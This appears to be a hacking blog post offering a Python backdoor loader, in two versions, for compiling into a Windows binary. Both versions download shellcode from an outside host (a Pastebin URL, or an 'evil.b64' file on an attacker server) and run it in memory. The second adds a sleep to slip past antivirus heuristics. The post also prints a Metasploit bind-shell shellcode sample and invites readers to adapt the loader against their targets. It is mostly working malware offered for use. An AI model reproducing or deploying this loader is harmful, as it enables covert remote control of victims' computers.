The following is a very simple backdoor I created in Python and compiled into a Windows binary using PyInstaller. The code downloads ASCII shellcode from a pastebin URL, interprets it as hex opcodes, injects it into memory, and executes it (without touching disk).
(I'm aware how primitive this is, but it got the job done)
Simply upload your shellcode to Pastebin, change the URL in the source code, and compile. Your shellcode should be in raw alphanumeric ASCII form, as follows:
fce8890000006089e531d2648b5230 8b520c8b52148b72280fb74a2631ff 31c0ac3c617c022c20c1cf0d01c7e2 f052578b52108b423c01d08b407885 c0744a01d0508b48188b582001d3e3 3c498b348b01d631ff31c0acc1cf0d 01c738e075f4037df83b7d2475e258 8b582401d3668b0c4b8b581c01d38b 048b01d0894424245b5b61595a51ff e0585f5a8b12eb865d683332000068 7773325f54684c772607ffd5b89001 000029c454506829806b00ffd55050 50504050405068ea0fdfe0ffd59731 db53680200115c89e66a10565768c2 db3767ffd5535768b7e938ffffd553 53576874ec3be1ffd5579768756e4d 61ffd56a006a0456576802d9c85fff d58b366a406800100000566a006858 a453e5ffd593536a005653576802d9 c85fffd501c329c685f675ecc3
#!/usr/bin/python from ctypes import * import urllib2 URL = "http://pastebin.com/raw.php?i=48k0BXpq" # msfpayload windows/shell/bind_tcp LPORT=4444 # modify that URL for whatever shellcode you want downloader = urlopen(URL) paste = downloader.read() alphanumeric = paste.replace("\r\n", "") shellcode = bytearray.fromhex(alphanumeric) array = create_string_buffer(shellcode, len(shellcode)) shell = cast(array, CFUNCTYPE(c_void_p)) shell()
*see bottom for source
I wrote another version of this script that downloads the raw shellcode data from a server that you specify, in case your target blocks Pastebin. I added base64 support and a sleep to outwait certain heuristic engines.
#!/usr/bin/python from ctypes import * from base64 import b64decode from urllib import urlopen from time import sleep URL = "http://server.com/evil.b64" # This should be changed to wherever you are hosting your malware package downloader = urlopen(URL) # download the package shellcode = b64decode(downloader.read()) # de-base64 the shellcode sleep(31) # avoid time-based heuristics array = create_string_buffer(shellcode, len(shellcode)) shell = cast(array, CFUNCTYPE(c_void_p)) shell()
This is not advanced, but it is effective.
Feel free to extend and modify this to fit your needs.
*Big thanks to TJ O'Connor for writing Violent Python. I highly recommend it to everyone. I took the shellcode casting portion of this code straight from his book.